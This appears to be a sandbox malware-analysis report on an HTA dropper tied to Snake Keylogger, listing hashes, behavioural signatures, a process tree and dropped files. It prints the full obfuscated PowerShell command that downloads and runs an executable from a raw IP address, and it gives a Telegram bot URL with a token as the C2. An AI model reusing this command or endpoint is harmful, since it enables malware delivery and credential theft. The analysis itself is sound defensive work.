Overview

overview

10

Static

static

1

seethebest...me.hta

windows7-x64

10

seethebest...me.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    16-10-2024 15:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    seethebesthtmlthingsreadyforgetme.hta

  • Size

    129KB

  • MD5

    03140c0995d8db21fe4fb2f030322615

  • SHA1

    0199286b876a0d3e896b1830ff024555374e51f3

  • SHA256

    95e002035116146de7fdf04b59845552552c7527b8bb3893abaf3a51d5061305

  • SHA512

    9f2682368cd24bf210edf0ec6d286d016a89b5fba4649fdd76d18bdc7f1cbc4dfb079079d074756dbfcf6377c1e34d6b59664df6ca7a8e6770af2fce704e09f9

  • SSDEEP

    96:Eam780jLy6w80jLyrdUwSdffYJMK0jLyqx0jLyt0Aj5OtG80jLy987T:Ea280f7w80fCUpdWMK0fd0fX5A80fGCT

Score
10/10
snakekeyloggercollectiondefense_evasiondiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
    defense_evasionexecution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebesthtmlthingsreadyforgetme.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\SysWOW64\WInDoWspOwERsHell\v1.0\PowERShELL.Exe
      "C:\Windows\SYStEM32\WInDoWspOwERsHell\v1.0\PowERShELL.Exe" "POwersHelL -ex byPaSS -Nop -w 1 -c deViceCrEdeNtIAldepLoyMENt.exE ; Iex($(iEx('[sYStEM.TEXt.enCodInG]'+[cHaR]58+[chAr]0X3a+'UTf8.gETSTRInG([SYSTEm.COnVert]'+[ChaR]58+[ChAR]0X3A+'FroMbASE64strINg('+[ChAR]0X22+'JG44ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlckRFZklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1tVkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrd1pEdUhyU0osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6cUxySWYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUN1bGdiLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmlmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkp4dkVqQU9mV0RaIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ2V1USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG44OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMjUvMjgwL3Rhc2tob3N0dy5leGUiLCIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSdC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIg=='+[chAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1056
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex byPaSS -Nop -w 1 -c deViceCrEdeNtIAldepLoyMENt.exE
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3000
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sitdwc6g.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2676
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES790.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC78F.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2972
      • C:\Users\Admin\AppData\Roaming\taskhostw.exe
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1640
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:1748

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES790.tmp
    Filesize

    1KB

    MD5

    16c541e84bc02c44947f9bbd5ba03da1

    SHA1

    0d1509ea9e9da869a5bebd63fb24447f58e314aa

    SHA256

    8c94ad70f2e27075d0f923b8e42db88927a4b858121fff1e7b72d1f9d2db56f8

    SHA512

    e8ae273c0e226bf7795b34e52bfcd6e832e3aed2b1146df97309e0f032bffda7b268a95774af3353ec7a2f684a31e8a6ea8fafb990978a38c7a2a348703353b6

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\sitdwc6g.dll
    Filesize

    3KB

    MD5

    9dedf4bb9527dd4fe47666e2c8414678

    SHA1

    80a531a2d73bcb4a16af646110457563ee54b19b

    SHA256

    a49c9c791ef931dd0d231a1b0a843d14acb3ff2f768e1ece9789ab4508cfda16

    SHA512

    ecc8d0c88a4731f43ef89e2cb6bcb032507e852758012e5e4ba1c65a0de2b0e3e70576a23c0d1e2f81b1560dbd112e52e8c932d7e8da9fee7e0a89449c3cd666

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\sitdwc6g.pdb
    Filesize

    7KB

    MD5

    d3fce5ea05746a7aea6c0db3485bf8b8

    SHA1

    2ee9ad5c2b91ccb930b1a2d92d10315a4cfd2834

    SHA256

    03af4eeaa5414502a30d91a9e24abc3aace5e202311b561ff188083f32891e16

    SHA512

    8ab038f449c927228937c2737cea414f2299af97a5e5542cc50c40fddf59001c364f131ff5b54c3e6a6da996e4193aed5a97063f5a99829b36681a3fdc3f0bfb

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    544386772ee7d88b7a51e2cda4d02d02

    SHA1

    be3dbb0fab0bc22486b3a4508a6aab931c50c392

    SHA256

    2d7ee3678b8c07e0aac535f8f18368b9fdd1b02f7d41c51a83410fd2ec35cbea

    SHA512

    1e0c1cf97346c7b5351c7f27a7d93dab3f98b65dc413205671ff5c68425905246037c69256a55d46d389c616bee976e8e9ebf9ae445e74c1e65c6d792dda2797

    Download Submit

  • C:\Users\Admin\AppData\Roaming\taskhostw.exe
    Filesize

    935KB

    MD5

    daaa8ac3995fb610eda2e52a639d191f

    SHA1

    2a26a631b79878c461248d5c03a33fb312aedb05

    SHA256

    e82aa9f8f95f53d306db35e28e6fdd4dd16eba7d7437971f929d3cf5470267b7

    SHA512

    808c18d514439aead5759bd3d1bfbfb1b31cfb6c03a147db8525aa8f7dec30fb4b73a12b4e4310f97b9917f6513594d917184434f49ff9a5ee1870c46ae75157

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC78F.tmp
    Filesize

    652B

    MD5

    43386b3956421a9dfd6c91b969c870e7

    SHA1

    61f4ffa3988fbb1b22b481f279041493c074d433

    SHA256

    24e4f61d0670b55deab50495439ff24f4907bae1aa53dc29867681205f38d2c9

    SHA512

    bbb537842f21fb85bfd236049813431d60f520dc5b35ab38b503535cc8fddc19be12df641276bcdce1ca4bf3ae95c924e9a69062e481ffb6d57ddede881fa85a

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\sitdwc6g.0.cs
    Filesize

    474B

    MD5

    0e03065f874d09489b23d564815660e8

    SHA1

    005cc140f8d9ad68a7863aee4da445e466c98379

    SHA256

    9600c5f95e6b296008011163196ad864c684b50e172ea35f0ca140ce577c75f1

    SHA512

    a55b8c7d5656c0c854da908ecf6bcc64f9520b61ff21154aa548e01dbd69ffd762806c09b3ec331d94b23b6145b48e2e649ead07dab8d73a17bc2a6981800d10

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\sitdwc6g.cmdline
    Filesize

    309B

    MD5

    5ec531ef716a660f43a2484f73aaa904

    SHA1

    fb3dfcca0c0fb48ab6810adaac77f0fdd4e140d7

    SHA256

    8fb09496b2a1ca4a21d29be2ecb7719af3b58c0641d513a653c4f28eb3972cac

    SHA512

    bd26fd87a38141a4dc1713da36e1567b5b71418a03f1010ad5bacdcdf01084213cf2b3fc639e541a7bd5d066d5dff4745651c33b24009216a90ed5719214ebc4

    Download Submit

  • memory/1748-34-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1748-35-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1748-36-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download